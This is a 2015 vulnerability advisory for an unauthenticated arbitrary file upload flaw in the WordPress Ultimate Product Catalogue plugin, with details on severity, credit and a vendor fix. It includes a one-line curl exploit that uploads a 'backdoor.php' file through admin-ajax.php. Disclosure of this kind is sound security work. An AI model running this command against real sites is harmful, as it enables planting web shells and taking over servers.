Title: WordPress Ultimate Product Catalogue Vulnerability Date: 22 April 2015 Author: Luca Ercoli Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/ Vulnerability Discussion: http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability Version: 3.1.4 Tested on: 3.1.1 (and previous version) Product Description: ------------------- Ultimate Product Catalog plugin is designed to help WordPress sites administrators display products quickly and easily in an attractive and customizable layout, making your catalogue easy to browse, sort and update with categories, sub-categories, and tags. Vulnerability Summary: ---------------------- Severity: Critical Class: Unauthenticated Arbitrary File Upload Remote: Yes Vulnerable: Wordpress Ultimate Product Catalogue Plugin 3.1.1 (and previous versions) Credit: Luca Ercoli http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability The vulnerability occurs due to the use of user-supplied input without proper validation. By sending a specially-crafted HTTP POST request, a remote unauthenticated attacker can exploit this issue to upload arbitrary file and execute it in the context of the webserver process. Vulnerability Description: -------------------------- Full disclosure and a proof-of-concept (PoC) exploit at: http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability Exploit: curl -v -k -X POST -F �Products_Spreadsheet=@./backdoor.php� �www.site.tld/wp-admin/admin-ajax.php?action=widgets_init&Action=UPCP_AddProductSpreadsheet� Vendor Response: ---------------- According to the vendor, a software version that fixes the vulnerability found has been released and is available for download.